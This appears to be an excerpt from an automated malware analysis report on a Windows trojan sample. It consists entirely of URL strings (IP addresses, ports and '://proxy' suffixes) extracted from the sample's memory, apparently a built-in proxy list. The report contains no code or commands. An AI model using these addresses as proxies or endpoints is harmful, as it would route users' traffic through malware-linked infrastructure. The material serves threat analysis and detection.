                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.244.30:44957
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.244.30:44957://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.112:36149
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.112:36149://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:14103
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:14103://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:36149
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:36149://proxyHJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC65000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38117
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38117://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38780
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C760E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38780://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:49824
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:49824://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.55:22508
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.55:22508://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.6.238:58977
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.6.238:58977://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.18.234.13
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.18.234.13://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.18.234.13:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC88F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.119.190.185:777
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.119.190.185:777://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.26.11
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.26.11://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.26.11:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.43.203:56442
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.43.203:56442://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.5.111:26783
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.5.111:26783://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.5.111:42404
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.5.111:42404://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC75000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.5.111:9601
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.5.111:9601://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8029000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.19.254.2:21231
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.19.254.2:21231://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.195.91.76:23118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.195.91.76:23118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.189.42
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.189.42://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.189.42:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.29.120:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.29.120:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95C0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.98.127:53976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.98.127:53976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.213.213.124
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.213.213.124://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.213.213.124:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.35.15.200:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.35.15.200:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:60415
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:60415://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.102.118:7117
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.102.118:7117://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.55.81:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.55.81:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.78.38:60063
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.78.38:60063://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.233.136.41:48976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.233.136.41:48976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.233.136.41:48976x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.243.245.231:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.243.245.231:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC182000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.51:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.51:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.0.30:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.0.30:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC09000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.100.135
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.100.135://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.100.135:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.182.145:15685
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.182.145:15685://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.197.190
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.197.190://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.197.190:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0F0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.200.42:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.200.42:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.22.92:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.22.92:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.48.20:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.48.20:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.39:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.39:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.141.46:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.141.46:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.207.18:38328
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.207.18:38328://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.228.120:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.228.120:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA6C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.26.120:9010
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.26.120:9010://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.117.116.30:44009
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.117.116.30:44009://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.117.229.17:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.117.229.17:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.106.106:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.106.106:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.106.237:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.106.237:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.200.49:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.200.49:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.213.213:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.213.213:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8347000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C840A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.121.61.81:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.121.61.81:8080://proxyp
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.10.76:15908
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.10.76:15908://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.102.119
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.102.119://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.102.119:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.92.110:21346
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.92.110:21346://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.92.110:35982
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.92.110:35982://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.2.68.129:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.2.68.129:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.218:43478
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.218:43478://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.228:59480
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.228:59480://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.232:48915
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.232:48915://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAABD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.204.95.166:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.204.95.166:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.219.50.170:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.219.50.170:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.3.218.141:54261
